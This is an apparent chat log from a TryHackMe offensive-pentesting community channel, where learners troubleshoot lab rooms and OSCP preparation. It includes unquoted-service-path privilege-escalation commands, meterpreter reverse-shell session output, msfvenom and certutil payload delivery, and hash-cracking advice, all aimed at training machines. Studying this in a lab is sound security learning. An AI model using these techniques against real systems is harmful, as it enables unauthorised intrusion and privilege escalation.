#offensive-pentesting-path
1 messages · Page 8 of 1
Sure. Hope it helps with another perspective.
It does. I am going to try some injection with the API calls from the command line this weekend and I will let you know if I get that working.
If it works in Meterpreter, there is no reason it shouldn't be able to work outside of it. Just need to spend time understanding how it works better...thanks again to @real sandal for those ideas
can anyone suggest me the best and cheap wifi adapter for hacking
Also, simply Google that one. There are a limited selection of adapters that generally work. Needs promiscuous mode and a chipset recognized by the system. Lots of guides.
https://resources.infosecinstitute.com/dumping-a-database-using-sql-injection/
@rancid vine thanks for this
Anyone solve Brainstorm (BOF)? I downloaded the binary file but it couldn't run on Windows 32bit.
@toxic night Is that using FTP? Check FTP mode to transfer files text/binary.
of course, I downloaded on binary mode
oh I got it... I confused the download file. Thank you
Guys
anybody took the OSCP after finishing the OSCP path?
were the machines in the PWK labs similar to those in the tryhackme OSCP path?
Hi Guys! am I the only one that in Steel Mountain is not able to run PowerUp.ps1 in powershell?
I tried running from shell, from powershell, I tried a different version of powerup... still no output!
Are you getting errors when you run it?
nothing at all
You're probably not going to have success trying to call Powershell from a reverse shell. Did it work in Meterpreter?
Did you run Invoke-AllChecks?
That's not how you use powershell
from the meterpreter i go either in powershell_shell or as in the picture I'm in the normal "shell" dos
@rancid vine I agree, this is not powershell, I'm in the normal shell here... because in powershell does not work either
i feel so stupid now! thanks @terse perch it works!
Oh don't feel stupid, we are all learning
I was expecting it to output straight away instead of loading the functions only!
Powershell is a scripting language. Works similar to other scripting languages.
it is working thanks guys
I did find that I needed to get the PowerUp.ps1 version from PowerShellMafia
in github right?
Yep
The other version doesn't give you "CanRestart" which is needed for the privesc
i got that one, and CanRestart is true
There are windows commands you can run to get similar info.
@rancid vine sure, pure powershell i'd go: get-service | select-object *
sc qc "AdvancedSystemCareService9"
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """
Running that will tell you if there are any USP's on the machine as well.
Nice!
And if you cd into the Directory that returns, you can run icacls against the directory name.
This will tell you what your permissions are with the service and directory.
If you look at Bill at the top, you can see RX,W. That is read, write, execute authority.
Really the payoff here is if you get a machine that has a crap shell, or Powershell isn't working nicely, you have some manual options.
cool!!
interestingly the sc qc command is not working in the vm
Make sure you are in a parent directory
So in this case I had to be in the IObit directory
But you can do it from the C:\ directory as well. Anywhere in the program path should work if I'm not mistaken.
who found the "name of the abnormal service running" in "HackPark"?
i was able to get the flags and everything, but I can't find what answer they want for question #3 in Task 4
I did
Every process is an exe
got it.. i tried entering every single running process, from the obvious to the impossible one. still cannot find that one
but still can't find it
btw, the machine keeps terminating even when clicking on "add 1 hour". it's the 2nd machine that this happens...
@marble tiger Does this happen after 1 hour? Maybe you need to refresh the page first. Or refresh the page after to confirm
@scenic glen it happens after 1h even if I extend the time. I already reported in #site-bugs and seems it's a problem that has already been reported especially for HackPark
@marble tiger Cybermentor just released a YouTube video on HackPark if you are looking for some pointers https://www.youtube.com/watch?v=LN5ORLHaqXI
Thanks @terse perch I was able to complete the room, but I'll check the video as well! I like to see other people's approach
Stuck on Steel Mountain Task2 Q2
I see port 80 and 8080 open
but the server versions I see dont match the answer format
It is looking for the Name of the file server, starting with the name of the Company that creates the product.
It is four words...starting with the company name...if that helps
Let me know if you want any help beyond that
No...different company name
If you Google HttpFileServer 2.3 exploits...you should see information with the company name...especially in exploitdb
ahhhh okay, didnt know if that would be required for this step lol
just assumed it was all in the nmap
It should be the first result in your Google search
Got it
Awesome
thanks!
meterpreter > upload /thm/steelmountain/Advanced.exe C:/Users/bill/Desktop
[-] Error running command upload: Errno::ENOENT No such file or directory @ rb_file_s_stat - /thm/steelmountain/Advanced.exe
meterpreter >
Why does this keep failing
I assume it has something to do with my directory format
The file exists, I just made it
I'm not sure on that one. I went a different route on the exploit.
i got it
Nice...was it the directory format?
yeah i didnt need it, just the file name
now trying to finish step #3
it says upload it and replace the legitimate one
where's the legitimate one lol
C:\Program Files (x86)\IObit\AdvancedSystemCare\
keeps saying the directory is invalid
meterpreter > cp ASCService.exe C:/Program Files (x86)/IObit/AdvancedSystemCare
meterpreter > cd C:/Program Files (x86)/IObit/AdvancedSystemCare
[-] stdapi_fs_chdir: Operation failed: The directory name is invalid.
meterpreter > cp ASCService.exe C:/Program Files (x86)/IObit/Advanced\SystemCare
meterpreter > cd C:/Program Files (x86)/IObit/Advanced\SystemCare
[-] stdapi_fs_chdir: Operation failed: The directory name is invalid.
You might need to use quotes around the directory since there is a space between Program and Files
I would switch to a shell on the server, and make sure you are copying the file from bill's desktop to that directory
gotcha
the 'bill' user should have permissions to do that
omggggg
C:\Users\bill\Desktop>copy C:\Users\Bill\Desktop\Advanced.exe C:\Program Files (x86)\IObit\Advanced SystemCare
copy C:\Users\Bill\Desktop\Advanced.exe C:\Program Files (x86)\IObit\Advanced SystemCare
The syntax of the command is incorrect.
quotes maybe?
why is windows so bad
not recognized
One sec...let me look at my notes on that
That is what I did, and that worked...
I think it has to be the relative path
oh as Powershell
Ohhh yeah...lol
I guess that is another difference
It should still work thought
though
with cmd.exe
I used Nishang to get a reverse shell through the web server exploit
Didn't use Metasploit
The box went down
lol...ugh, that's the worst
If you are curious on taking that different approach....Ippsec has a video on Optimum from HTB...and it is the exact same HTTP File Server exploit...and pretty cool
Exploits the same null-byte exception vulnerability using Burp
i am still struggling with this stupid copy
Did you stop the service first?
no
That might be part of it
do I need to kill it?
Yes
You can just do it by name "AdvancedSystemCareService9"
Hmm that's weird...that is the path I took and was able to get it to work
There are a couple write-ups out there that might help to take a look at their screen shots, just to make sure everything looks right
PS > Stop-Process -Id 848
ERROR: Stop-Process : Cannot stop process "ASCService (848)" because of the following error: Access is denied
ERROR: At line:1 char:1
ERROR: + Stop-Process -Id 848
ERROR: + ~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : CloseError: (System.Diagnostics.Process (ASCService):Process) [Stop-Process], ProcessCommandException
ERROR: + FullyQualifiedErrorId : CouldNotStopProcess,Microsoft.PowerShell.Commands.StopProcessCommand
ERROR:
access denied
wtf is going on
Not sure if it matters, but I was in the "AdvancedSystemCare" directory when I stopped the service...I believe
Sorry man, that is frustrating
Nice, I was hoping you might be able to help him
I'm reading through the comments trying to make sense of things really quick.
He was having issues getting the service to stop
I haven't done that from Meterpreter...so not sure what might be causing the issue
I see errors in the way the upload was attempted and the attempt at changing directory.
i got the upload working
its in C:\Users\bill\Desktop
I can't copy it to the Service Directory
and I cant kill the service
as meterpreter or as Powershell
If the directory is C:\Users\bill\Desktop, your upload would have to be "C:\Users\bill\Desktop"
Yeah thats not the issue anymore
Why are you trying to kill it from meterpreter or powershell?
That's not going to work.
Where would you kill it from?
Drop into a shell my man.
okay im in a normal shell
I tried this too
to copy the file from Desktop to the folder
wasnt working
It works fine when done correctly. You're making a mistake somewhere.
Why not do this:
C:\Users\bill\Desktop>copy ASCService.exe "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
copy ASCService.exe "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
The system cannot find the path specified.
0 file(s) copied.
||Start a local python server, and go to the proper directory and run certutil to pull it from your Kali machine to the directory.||
thatll work too
Umm, why are you messing around with the ASCService file?
That is what the unquoted path vuln works with
But you aren't replacing ASCService.exe
You're supposed to inject a maliciously named payload into the path before the system gets to it when the process is started.
im not sure how to do that
Right...by replacing the ASCService.exe with a malicious file
Oh, well I did and that worked lol
I dont understand the image lol
I thought the directory ASCService is in was system privileged.
The image above describes how a service path is run when the path is "unquoted."
and AdvancedSystemCare
ok sorry
In this case, the service path is C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
In this case, being as the path is not specifically defined due to the lack of quotes, the system will attempt to run the following in each directory:
C:\Program.exe
C:\Program Files (x86)\Iobit.exe
C:\Program Files (x86)\IObit\Advanced.exe
C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
You shouldn't have access to the Advanced SystemCare directory as it requires elevated privileges. So you can't replace ASCService.exe. But as the path is unquoted, you can replace something like the Advanced SystemCare directory with Advanced.exe.
Ahhhh, that's way easier than the approach I took....over complicated it
Because when the system lands in IObit, it will try to execute what it finds. So we give it an executable named after a directory, in this case Advanced SystemCare.
This is the approach I took, after stopping the service, and was able to get system shell
Task #3 tells you how to stop and restart services. Now, I would ignore personally the powershell command they offer (it doesn't provide much context), and run the following command to determine if there are unquoted service paths first:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "C:\windows\\" |findstr /i /v """
Follow this by going to the directory in question that hosts the service returned, and in this case run icacls "Advanced SystemCare"
This will tell you if the service and directory is modifiable by the users on the machine.
I'm intrigued that you were able to modify that directory. I didn't think that was possible.
I'm in the middle of HackPark..once I finish I will go back and try again....can't remember right now as it has been 5 days
Typically unquoted service path challenges won't allow you access to the directory the executable is located in.
I also came in through the HTTP File Server by dropping Nishang and getting a reverse shell in that manner...not sure if that makes a difference...still was 'bill'
Yea, that's a way different way than I took.
Ippsec showed this approach in Optimum...same Http File Server version
im confused
the task doesnt show those instructions
did i copy the exe to the right place?
I dropped into the correct location when I did it and just grabbed the file from my python server.
¯\_(ツ)_/¯
im confused
Don't pay attention to my comments...I came at it from a different approach than the instructions.
I try to complete each box w/o Metasploit since you technically can't use it on the OSCP and I am taking it in July
Listen to @rancid vine , he took the approach that the instructions are getting at
All of the guides I've written are done without metasploit
I think Steel Mountain I followed the room and so I included it. But honestly I think the metasploit version overcomplicates things a lot.
i've just started to see your stuff in the last week...definitely going to be checking it out
Oh cool
Up till now I have mostly seen Ippsec, TCM, and John Hammond
Obviously, there are a lot of sources, but I try to stick with the same consistent people, definitely adding you to that list
And I just tested what you said about the way you do it. I'm surprised that even worked. Usually the directory isn't able to be modified.
Were you able to get it to work?
Yea. I'm just shocked that directory can be modified. Not really an unquoted service path vulnerability at that point.
I know, right? lol But, I am glad you explained the path you took. I better understand the true essence of unquoted service path and will not make that mistake again...it worked, but shouldn't have the way I did it
yeah im lost
Yea. The way I just did it, and the way you did it isn't actually USP.
Tyr4el, what are you lost on specifically?
Good. Half the battle.
||C:\Users\bill\Desktop>sc start AdvancedSystemCareService9
[*] Sending stage (176195 bytes) to 10.10.119.80
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.||
ugh
ive lost track of which ports are what
i gotta start over
box died anyway
oh well
gotta go
Check this out if you need help. https://www.cybersecpadawan.com/2020/04/tryhackme-steel-mountain-metasploit-and.html
Is that your site @rancid vine
Yep
Nice! I'll be checking it out. Appreciate you brother
Oh that's a really good walk-through with explanations
I'll use that one
When I get a chance to restart the box
I've tried every possible combination I can think of....what is HackPark Task 4 Question #2 looking for?
im STILL
stuck
at restarting the service
its not calling my job
multi/handler
@rancid vine
oh i had it
but it died
when i do exploit -j am i supposed to wait until it finishes?
It just says started reverse tcp handler on xxxxxxxx
but then never does anything
just stays on a blank line
Do you have the listener running on 5555?
aye
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
[*] Sending stage (176195 bytes) to 10.10.158.97
sc start AdvancedSystemCareService9
[*] Meterpreter session 3 opened (10.8.17.120:5555 -> 10.10.158.97:54816) at 2020-05-10 17:31:47 -0400
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
C:\Program Files (x86)\IObit>[*] 10.10.158.97 - Meterpreter session 3 closed. Reason: Died
thats what happens
Hmmm not sure what is happening there.... @rancid vine will need to take a look
it opens but the meterpreter shell never opens
all I get is a blank cursor
idk if i need to open another msfconsole instance and interact with the new session or what
you should be able to switch between sessions in the same msfconsole instance
When you get the cursor, you cannot interact with it?
maybe just try whoami
ight
C:\Program Files (x86)\IObit>sc start AdvancedSystemCareService9
[*] Sending stage (176195 bytes) to 10.10.158.97
sc start AdvancedSystemCareService9
[*] Meterpreter session 4 opened (10.8.17.120:5555 -> 10.10.158.97:54824) at 2020-05-10 17:36:18 -0400
whoami
ps
migrate 1660
sysinfo
lul
lol
and it failed
What about trying to run a Netcat listener and connecting to that
It must be connected somewhere
msf5 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows STEELMOUNTAIN\bill @ STEELMOUNTAIN 10.8.17.120:4444 -> 10.10.158.97:54798 (10.10.158.97)
msf5 exploit(multi/handler) > sessions -i 4
[-] Invalid session identifier: 4
even though the multi/handler keeps incrementing they're just like...dead somewhere
you have 1 session open
you're trying to open session 4
Yes I know
bc the last multi/handler I opened was 5
so I figure the others are alive somewhere
had to try
He is trying to get a reverse shell on 5555, but it keeps quitting on him
yeh
He's trying to make sure it is not still alive somewhere before trying to start up a NC listener
^
aaah I gotcha!
im determined to get the multi/handler to work
sudo lsof -i:5555
should tell you if there's a process with that port running on your vm
namelessone@namelessone:~/thm/steelmountain$ sudo lsof -i:5555
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
ruby 6211 namelessone 7u IPv4 141547 0t0 TCP 192.168.196.128:5555 (LISTEN)
idk how it got that IP
thats not what I set
kill 6211 didnt kill it lol
that IP address will be your kali vm
so you didn't set the msfvenom (I assume) to the right ip / interface
I definitely did
O.o
sudo kill -9 6211
kill just sends a sigterm which is the first one to do, if it doesn't respond then a -9 or sigkill will work
it isn't the best but
haha yeah something funky seems to be going on by the sounds :^^
i give up
this is stupid
its just dying constantly
how do i get the payload to connect back to me?
i gotta redo the whole damn thing
using netcat
same way just dont use multi/handler?
okay lets do this
hope it works
yes, you create your msfvenom payload with a windows tcp payload...and then just run Netcat listener
You can use msfvenom and catch it on netcat for sure
@terse perch beat me to it
Something weird is happening
yes
I've done everything but Task 5 of it
I don't remember having an issue with getting a meterpreter shell though
I think there's a known bug I remember seeing recently
What for the love of all that is holy does Task 4 Question 2 want?
I've tried every combination I can think of for the OS and I can't get anything to work
Oh it's not that exact bug that I'm thinking of, but it's quite unstable at the best of times I think
I've been able to root the box and get all the flags, just trying to figure out 2 remaining questions it is looking for
uh two ticks I'll have a look at it
Oh right
well there's a useful command in meterpreter that'll tell you
That's how I got it when I did it
haha Ugh, I guess I need to fire up Meterpreter then lol
I love these rooms...just wish you didn't have to use Metasploit to get some of the answers
You don't have to use meterpreter to get it but it's the nicest way
I'm pretty sure that box has wmic
There's quite a few command line commands you can use to find out the answer tbh
I have systeminfo and have run winpeas...I know what the OS version is...I just don't know how they want the question
Mhm, wanna screenshot me what you have over dm?
Yes, one sec
i honestly dont know how but the LHOST keeps getting set to my actual Local IP somehow
even though i never type it in
now setting LHOST is broken
Idk whats going on
screw it, moving on
can you not set to interface tun0 rather than specifying an ip address in that case?
That's real odd O.o
yeah it really is
That is probably it right there...I saw someone else with a right up that said it kept dying until they put tun0
i could try reinitializing the db
write-up
then when I ran exploit, it didnt even run
just quit immediately
even with all options set
ive been on that one for a few hours
im over it
just note to self that i need to work on learning this stuff
what types of files does IIS serve?
ASPX?
sounds like a really good google question
it does...and i did look
lol
oh okay found em
why is dirbuster not picking up anything on Alfred then
Oh nvm
You mean Jenkins lol
lol
Finished Task 1 and had to go
Womp
So I'll have to rebuild a new project next time but at least I know where to go
That's what I had to cheat with. Had never seen Jenkins interface before and the steps were like "okay go ahead and execute your powershell code!" And I'm like "cool, where"
lol I was the same....I finally figured out where after like an hour
I cheated cuz I was short on time. My daughter was about to wake up from her nap
Need help with Brainstorm... I have managed to get a shell on a WinXP and a Windows 7 VM... however for some reason when I try the exploit against Brainstorm... it doesn't work
Does anybody know why this could be happening?
I just figured it out never mind ...
can I bug someone about hackpark?
im getting a connection back on my listener but no shell
Referring to the File Manager upload?
oh no for the non metasploit part
but i just figured it out
was using staged payload lol
Yep.
Game of Typos
Hey all, looking for a nudge on Lord of The Root. I've ||found the log-in page but can't get past it. I've tried to hydra it but don't know the username. I've tried admin and 'legolas'. Have I missed something or do I just need to go at it with a username list as well? ||
^ Ah, nevermind. ||I tried to test manually for injection -- being OSCP prep and all. Just tried SQLMap as a double-check and it does work. ||
Hahaha, right? I've got my head around manual injection with UNION SELECTs and stuff but not the blind/sleep stuff. Need to look into all that more
I typically use jSQL, much better interface
Finally finished the path 100%! Thanks to TryHackMe and all the room authors. Whilst I wait for the 'Extra Credit' section to grow, are there any other rooms that people would recommend? All I've done on the site so far is this path.
Thats awesome!
Nice one:)
There are lots of rooms that will help you
That path needs updating
Try some of the more recent challenges
I was going to just sort by popularity and join ones I haven't done yet but thought I'd ask here first
Amazing, out of interest, how did you hear of THM?
Attacktive Directory is really good.
It can be done 100% without Metasploit as well.
A colleague from my work recommended it to me on our "lockdown chat" hahaah (Plus I'm trying to angle for them to pay for my OSCP so doing this shows I'm "serious"!)
Ah fair enough, thats cool
In their eyes I mean, I'm actually really enjoying the site. More than HTB in a way because you can sort of seek out things you want to brush up instead of crossing your fingers it shows up on a box with a cryptic name
Yeah, we have a different approach to learning to them.
But really pleased you liked the course.
I prefer it, thanks a lot for starting all this
Keep up the great hacking, and as The Mayor said, Attacktive Directory is a good next room. As in OSCP, try to do as much of it as possible without metasploit.
I see people praising my creation
Its a great room ngl. I might put it under our featured rooms for Intermediate/Advanced experienced levels actually?
Go for it
hi guys. Has anybody experience with the challenge at the end of room "Buffer Overflows" -> overflow-3?
I'm stuck on that for 3 days :). I created a payload, the shell comes, but not under user2, but under user1.
it's task 8
@frosty talon Did you notice, that the binary has got a suid bit set?
no i forgot. You are right, suid is set
can someone answer a quick john question for me?
im not getting a password but i know the version and flags used are correct
A bit more information would be helpful.
oh wasnt sure if we have to dm questions to avoid spoilers
basically john runs
but im not getting a password from the hash
Which room?
Can you take a screenshot and mark it "spoiler"?
@wide jungle If that's a unix account password (I can't remember the task well enough to say)
It won't be Raw-SHA256
Remind me the task again?
It says there are 22 hashes?
Trust me to not bother taking notes for that one...
Shouldn't there just be one hash from the sqlmap output?
But John thinks there are 22....
Hm, try removing the space between the = sign and the wordlist path?
still not working with edits
this wouldnt be the first time they tell us deprecated commands
im using kali 2020 fyi
That won't matter
Something seems off with the way the hash is in the 'hash.txt' file
Basically, your command is correct....something is just off between getting the hash from the user db and John reading it
try vim
ctrl+shift+v then :wq ftw
Not sure if that is much help, but looks like that is what is happening to me. @rancid vine might have some other ideas
Try doing echo -n "<hash>" > hash.txt
Then doing that
Just tried it and it works for me
Whats the issue?
Just use nano, echo takes out a lot of the original hash for some reason
What on earth are you on about?
Oh, sounds like you're not escaping stuff
@wide jungle
Can confirm, that will work
If it doesn't, your JtR has a problem
(Also make sure that you've unzipped rockyou -- common mistake there)
Yea I don't remember this one having any issues.
And I have a hate/hate relationship with hash cracking.
John is ugh
My rockyou regularly throws UTF-8 errors though, so I eventually went with something else.
What do you prefer....hashcat?
Mhm
lol
i have rockyou unzipped
Custom hash cracking program anyone?
i think jtr is broken in kali
If it isn't tomcat:s3cret or admin:admin I'm moving on.
I'll spin up a box quick and see what I did
@chrome valve only if it's 500% less efficient than others
@wide jungle Try using the command I gave you? echo -n "<hash>" > hash.txt
so yeah im still having issues
didnt help
a bit frustrated but these situations are really annoying when learning this stuff
ive had 100s of them
Ok, DM me your exact syntax -- if it's right, I'll give you the password so you can move on with the room
If this kinda thing is happening regularly, you may want a new VM btw
You may want to go back to 2019.3
it ends up being old commands, deprecated flags, or they dont say they are on a specific version
Also, remember that hacking, by nature, is never going to be a streamlined process
It's all research and learning
thats fair just wish if i pay for something the other side notes caveats
im sure there are too many though
And yeah, unfortunately things change too quickly for us as content creators to go back updating every five minutes
Annoying side effect of a fast moving industry
I just cracked it in less than 3 seconds using the recommended syntax in the room.
thanks @chrome valve
looks like john is cracking and caching the password
but wont stdout
Np
*gunzipped
Unzipped being the generic term, Kris...
Who solved Lord of the Root? I need a help..
I found hidden service and that's it. i played a gobuster but there's nothing special.
Someone else having powershell issues on Alfred ?
Anyone working on Brainstorm box?
Please be more descriptive Batman. Frosty, are you having issues? If so, what are they?
I am having an issue with Task 4, generating shellcode with msfvenom. I create the shellcode as stated by sawinskii's walkthrough and when executing the .py script chatserver.exe shuts down on the Windows 7 VM I'm running. I have tested creating msfvenom shellcode to have the calc pop and that works fine. However I cannot get the reverse shell to work.
Nevermind, I got it using meterpreter instead of nc
Depends which shellcode you use. You can do it fine using netcat, you just need to use the appropriate shell for it.
how long are we supposed to wait after deploying a machine?
i find i waste the first hour on tryhack waiting for the machine to actually respond and load even port 80
Hi there. This isn't really meant for this channel. You could ask this in the #room-help
It shouldn't take an hour
It should take no more than 5 minutes usually. Quicker if you're a subscriber.
Which machine are you trying?
What's this channel for?
The Offensive Pentesting path.
magic
I presumed that much, where can I read on this?
The learning path on the website would be a good place to start.
Any recommendations of Rooms (machines) for OSCP final prep? Done the Pen Test Path already.
@small dune give me a minute and I'll pull the rooms i used for prep
Thanks!!
would appreciate some further recommendations too, @final vault
@rancid vine Thank you for the response. I'll keep that in mind and try again with a different shell.
@final vault have you shared this already?
@smoky thorn Nope I'm waiting patiently
hahaha, i'm sorry, :c
Note these aren't all TryHackMe based, I used HTB equally to prepare but for this I'll split them up so it's obvious which ones are there;
THM
- Obviously most of the Path on the platform
- Ignite
- CMesS (Has some value)
- ConvertMyVideo (New room I didn't use but could apply)
- Brainpan (Buffer overflow goes brrr - ez 25 points)
HTB
(Added as might help)
- Jeeves
- cronos
- bashed
- Shocker
(May be more but I can't quite remember)
Misc
- Vuln Server (TRUN Function)
- Great for enforcing buffer overflows (Easy 25 points)
I'll make an actual list that I feel has similarities on my blog soon™ and will keep it up to date
yeah I'm stealing this too
Obviously don't want to add too much HTB stuff due to the server we're in
yeah, feel free to drop a link in dms or wherever
Also once my new room/s come out I'll focus on pushing some newer prep boxes
Look forward to them! It'll be nice to have something to spend a bit of summer on (hopefully!)
@final vault Thanks !!!!
Thanks. since the other paths didn't have a channel I thought it was something else
Anyone Completed Corp by DLL exploit?
I have not. You should try though and let us know if it works. I'm guessing it won't due to the applocker restrictions.
Hey friends, are there any rooms on THM to practice tunnelling?
@cloud flicker SSH tunneling?
any of it really, I'm reading the module on PWK and it's tricky to get my head around it
@cloud flicker GameZone has SSH tunneling
^ I was about to type that
I've got it in an upcoming challenge
But I think those might be the only ones
Thanks both
@rancid vine Yeah I get only fela shell, maybe I did it wrong or something and I cant login with the password I found from UnattendPath It shows password expired
You really need to understand how App Locker works in order to understand why you won't be able to go a different path.
That one directory has been whitelisted. So even if winPEAS says there is a possible hijack point elsewhere, if that directory isn't whitelisted for modification you won't have permission to do so.
@cloud flicker check out sshuttle
you just need a valid set of creds.
You wont be able to nmap through the tunnel though. You'd have to drop an nmap portable binary on the dual-homed host unfortunately.
@crimson flame many thanks!!
Good day everyone... I just completed the "Tempus Fugit Durius" room... Can you recommend other rooms just like that one?
Borderlands is a good one
can I get help in brainpan1?
I am in the very last step but I can't use the ||GTFO|| because it doesn't prompt me, it just quits
I don't remember needing GTFObins for that.
So I recommend playing with the different commands options that are available.
||and understand how to do a shell escape||
ok. Thanks
can anyone suggest a smaller list to crack the hash found in Daily Bugle? Hashcat is taking a lot of time
@analog gull Are you running hashcat on your vm?
yes
Run it on your host machine
alright thanks! @noble glacier
Does the ||sqlmap|| for daily bugle usually take >10minutes?
@devout idol
Don't think so
Though I didn't do it with ||sqlmap|| as it says do it using a ||"Python"|| script
The ||"Python"|| script took just a min
Yeah, I think there's something in place to stop ||sqlmap|| scripts; mine just ran for half an hour and didn't enumerate the databases
I've just recently completed that room, search for the python script and use that instead of sqlmap.
Yep. It'll go much quicker.
What wordlist would you advise for cracking the password hash on Daily Bugle? Write-ups say takes around 20 minutes while mine's taken 30, currently using the rockyou one that comes w/ Kali
From memory it is rockyou @devout idol
If you haven't already, check my writeup on it. From memory I included a command to shorten it.
Legend! Thanks Muriland :)
Anyone to talk about brainpan?
I have completed the bof
But got some questions
Hi gang, I've been trying to elevate privileges in the Steel Mountain room by copying over the ASCService.exe. I keep getting the following error message after running my procedures over and over again on different instances of the box as well:
"The service did not respond to the start or control request in a timely fashion."
Any tips or ideas?
sc start AdvancedSystemCareService9
[SC] StartService FAILED 1053:
The service did not respond to the start or control request in a timely fashion.
That's an expected answer.
If you aren't getting the response you want, you need to go back over your payload and where you've put it.
As well as confirming that your listener is active and has the correct port.
Right, ok thanks for the help I'll keep checking it
You're definitely on the right track though.
Ugh that was frustrating for me too lol
Hi, could anyone give me a hint what I can do to obtain the root flag on the Corp box? Yesterday I had problems with RDP on that box, today I figured out that the admin's password has already expired. (I follow the unattended.xml escalation path). I could not find any sort of solution and I'm feeling a bit hopeless. I know that I could try a UAC bypass, but I'm not sure that way would allow me to type the root flag.
@fleet wedge Try renewing the admin's password.
Okay, I'll try, thank you!
@noble glacier It does not work either
It works
Are you accessing the box using rdesktop/xfreerdp? Or via browser tab?
I see. Because as far as I know the password renewal is available during the next logon, but there's no option for me to escape the corp/dark or corp/f*** account. I have tried runas /user:Administrator cmd - this would not work, obviously, due to the password expiration. I have tried logging out in the browser, but could not get the login prompt to provide creds for Admin or any user at all. I thought that maybe this Guacamole session was malfunctioning, thus I tried using rdesktop/xfreerdp, but my connection automatically goes down, because there's some error with CredSSP. It fails to connect using NLA or SSL. (Btw the commands 'shutdown -l' or 'logoff' executed from CMD do not work either - I get this Guacamole Remote Tryhackme login prompt, which crashes access completely). Damn, maybe I'm doing something terribly wrong and I have been thinking that there's something wrong with the box/guacamole, but in fact there is not. Anyway, something tells me that this challenge should not (probably) be as difficult as it seems right now (due to these login problems/being unable to connect to the box with rdesktop, which worked perfectly for me when doing such boxes). Idk..
I'm confused as to why all the extra stuff. Even the guide says you should Kerberoast, crack the user hash, and then use power up to privesc.
The flag is sitting in the Unattended.xml file. PowerUp should have found it, and all you have to do is use more to show the contents.
I have done this part already. I grabbed the content of unattended.xml and decrypted it on Kali. The only part is to log in as admin, but its password, which I obtained, expired heh.
You're supposed to renew the password.
@fleet wedge Are you using the THM online kali?
No, my personal
Ask your question in #room-help
I'm almost completely certain you don't have to renew any passwords.
Like 100% sure. You just log in with xfreerdp
Yes, but the password is expired and you have to set a new one
Like the box is broken?
Because I did this a couple weeks ago with no issue. Going through my notes right now and never made a note of any of that.
Are we talking CORP or IRON CORP?
Corp
i don't think that looks right
Interesting
nah, i keep getting 10.10
That's the IP displayed in this room
Idk
Strange
There was some issue with RDP yesterday I think, maybe that's still a problem
Alright, I'm logged in as admin on your machine
I had to change the password. If you want it I'll give it to you.
The password policy on the machine needs to be fixed.
It isn't supposed to ask for a new one
Okay, hm I get it now
So if you give me that password that will not be a cheat? xd
I can grab it from unattended.xml, it's not a problem haha
I just reset it to what it's supposed to be
Okay, so I'll try now
Okay, now when trying to run cmd as administrator (>runas /user:Administrator cmd) I get an error that the user name or password is incorrect. So I'll terminate the box and start it again
Ugh.
You should have a password from the Unattended file. Just try to xfreerdp to the address with administrator and reset the password I guess.
I submitted a bug for it. The password policy should be addressed on the machine.
@fleet wedge You're probably typing the password incorrectly, though; just follow Mayor's advice.
Okay guys, thank you very much for help!!
any issues connecting to thm?
Just finished the Offensive Pentesting Path. Thanks to all the room creators and those that provided help along the way. I really enjoyed every room.
I'm doing the Windows and Linux Privesc rooms next...but, would appreciate any suggestions on additional rooms that would be good OSCP prep.
@fleet wedge ropemporium
Can anybody provide some hint for the Lord of the Root priv esc... I have got the SUID file but am not able to figure out the priv esc
@brisk bloom It's bof if I remember correctly
Yes it is... is there any PoC script for fuzzing?
Write your own
ok..thanx
I don't remember Lord of the Root being a BOF
At least not one that you write out. There was an exploit available if I remember correctly.
Mayor, please check task 2 question 6 of the room
The answer is that, but it isn't a BoF in the sense that you have to create one.
I actually had to get help with that question because of it.
Just checked the creators writeup, there are two ways of rooting the machine.
||One is a bof and the other is an exploit available on exploit-db.||
I'll post it in the mentor chat
❤️
just finished gatekeeper, really educative box, great OSCP prep
I'm glad you liked it!
Found it challenging as my 2nd box of that type, although making the initial script to send its payload properly was painful for a while lol
https://github.com/puckiestyle/pentest/blob/master/brainstorm_puckie.py Does anyone have a working Python script for brainstorm? In mine, calc is not popping up. You may PM me if you can help me
Are you using Python?
Need to make sure you're using the carriage returns in your script as you have to provide responses before getting to the portion of the program that is exploitable.
Yes, Python script it is; any help would be appreciated
Anyone up to talk about retro? So I could PM to know whether I'm on the right track or in a rabbit hole
Eh guys, after a break in doing Corp machine (I have written here about my problems with the connection with the box), I am still unable to log in as admin and grab the flag. Does anyone else have problems establishing connection with the box via rdesktop/xfreerdp? I thought that after recent hot fixes, the box would work properly now, unfortunately it keeps on rejecting my connection/runas cmd
I'll provide screenshots of the problems below
Here's the error displayed when trying to connect via rdesktop
Here's successful runas user f***
Here's the error when trying to switch to admin with a correct password
And here's the error if the password is wrong
@fleet wedge Terminate machine and try to rdp into the machine as admin.
Sorry that I'm still stuck with this, but this is the last quest to finish whole path :/
You'll have to renew the password, if I remember correctly.
Okay, I'll try xfreerdp again, but 99% sure it will return error, I'll provide it below if pops up
Terminate the machine and deploy again.
So I have spawned the box again, tried xfreerdp as admin, provided correct password (pasted from notepad) and this happens:
Just as if there was no option to connect as admin, I have never had a problem like that before
Okay, I have some progress, I have changed options of connection and I'm on a good path to succeed (maybe)
All right, so I have found some troubleshooting on GitHub and changed the config of xfreerdp on my VM, but my attempts at logging in as admin returned an error as well. Then I tried logging in as Administrator but without using the domain name and I got a pop-up window, changed the password and succeeded! The thing is, I had tried that method at least 3 times before, so maybe changing the config in xfreerdp and then logging in as Admin was required. If anyone has the same problem, here is the GitHub link: https://github.com/FreeRDP/FreeRDP/issues/2862
Is anyone able to point me in the right direction on brainstorm, with the FTP server? No matter what I do, I can't list the directory contents. I have restarted the guest I think three times. The FTP service seems to be broken, or I am not doing something correctly.
Brainstorm is just FTP as user anonymous
@fleet siren, you can PM me if you want, I can help you partly on brainstorm
